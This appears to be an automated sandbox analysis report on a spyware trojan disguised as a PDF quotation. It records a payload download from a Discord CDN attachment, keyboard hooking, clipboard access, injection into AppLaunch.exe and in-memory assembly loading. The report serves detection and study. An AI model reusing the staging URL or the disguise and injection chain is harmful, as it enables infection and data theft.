                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /attachments/1152164172566630421/1153564703793107036/Rezyurp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/1152164172566630421/1153564703793107036/Rezyurp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49739 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, Cc3jA.cs.Net Code: i5rm
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383408214.000000000147B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_e5d413dc-a
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Source: initial sampleStatic PE information: Filename: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_05C0E1080_2_05C0E108
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_05C013A80_2_05C013A8
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_05C0DAD00_2_05C0DAD0
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_05C812B00_2_05C812B0
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_05C812A00_2_05C812A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_00FC425811_2_00FC4258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_00FCB46011_2_00FCB460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_00FCE63011_2_00FCE630
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_00FC4E7011_2_00FC4E70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_00FC45A011_2_00FC45A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0A5940F811_2_0A5940F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0A59917411_2_0A599174
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0A5931F811_2_0A5931F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0A595A4811_2_0A595A48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0A59B35A11_2_0A59B35A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0A59004011_2_0A590040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0A59916811_2_0A599168
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0A59A66811_2_0A59A668
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0A59A58011_2_0A59A580
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000000.304485513.0000000000F25000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWpwrtBM.exe> vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed1a53293-1b70-4e7d-a57e-8799cda6f341.exe4 vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVvtddtg.dll" vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed1a53293-1b70-4e7d-a57e-8799cda6f341.exe4 vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383408214.000000000147B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeBinary or memory string: OriginalFilenameWpwrtBM.exe> vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeReversingLabs: Detection: 47%
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/1@2/2
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_01
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, DispatcherProductAnnotation.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b10000.14.raw.unpack, --.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, uult.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, uult.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, uult.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, uult.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, ahU.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, ahU.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, fwzmQCK.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, fwzmQCK.csCryptographic APIs: 'TransformFinalBlock'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.4524220.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44e434d.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44767c0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44e434d.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44c432d.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b60000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b60000.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.4524220.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.383516213.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.383516213.0000000003533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.383516213.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.383893924.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.383676188.0000000004476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.383516213.0000000003462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe PID: 5436, type: MEMORYSTR
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, Definition.cs.Net Code: MapRole System.AppDomain.Load(byte[])
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.45da880.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.45da880.9.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.45da880.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.45da880.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.45da880.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b10000.14.raw.unpack, --.cs.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b10000.14.raw.unpack, --.cs.Net Code: _0003 System.AppDomain.Load(byte[])
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b10000.14.raw.unpack, --.cs.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.458a860.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.458a860.12.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.458a860.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.458a860.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.458a860.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5ba0000.16.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5ba0000.16.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5ba0000.16.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5ba0000.16.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5ba0000.16.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_05C0A9EA pushad ; iretd 0_2_05C0A9F9
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_05C0A300 pushad ; retf 0_2_05C0A301
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0A59BBA8 pushfd ; iretd 11_2_0A59BBA9
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.979516114599912

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
